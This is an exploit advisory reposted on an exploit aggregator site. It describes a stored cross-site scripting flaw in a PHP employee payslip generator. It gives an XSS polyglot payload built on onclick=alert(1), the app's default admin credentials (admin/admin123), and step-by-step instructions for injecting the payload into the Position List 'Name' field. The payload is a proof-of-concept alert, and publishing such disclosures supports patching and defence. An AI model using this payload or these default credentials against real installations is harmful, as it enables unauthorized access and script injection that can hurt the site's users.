Advertisement






Employee Payslip - XSS Polyglots

CVE Category Price Severity
CWE-79 Not specified High
Author Risk Exploitation Type Date
Not specified High Remote 2023-03-14
CVSS
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023030034

Below is a copy:

Employee Payslip - XSS Polyglots
# Title: Employee Payslip - XSS Polyglots
# Author: @Eawhitehat - Eren Arslan
# Demo available : https://www.sourcecodester.com/php/16264/updated-employee-payslip-generator-sending-mail-using-php-and-gmail-smtp.html
# CVE: N/A
# XSS POLYGLOTS
# Screenshot : https://prnt.sc/eeUxgczBF-Gj

Used Payload :
 onclick=alert(1)//<button  onclick=alert(1)//> */ alert(1)//

Admin account : 
admin
admin123

Method :
Connect to panel with admin acc : http://.../admin/

#Vulnerablity
1. After login with SUPER ADMIN, go to http://.../admin/?page=positions (Position List page)
2. "Create New" and add in "NAME" the payload :  onclick=alert(1)//<button  onclick=alert(1)//> */ alert(1)//
3. After New Position created, click in the form for exec your payload XSS Polyglots


Enjoy !

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.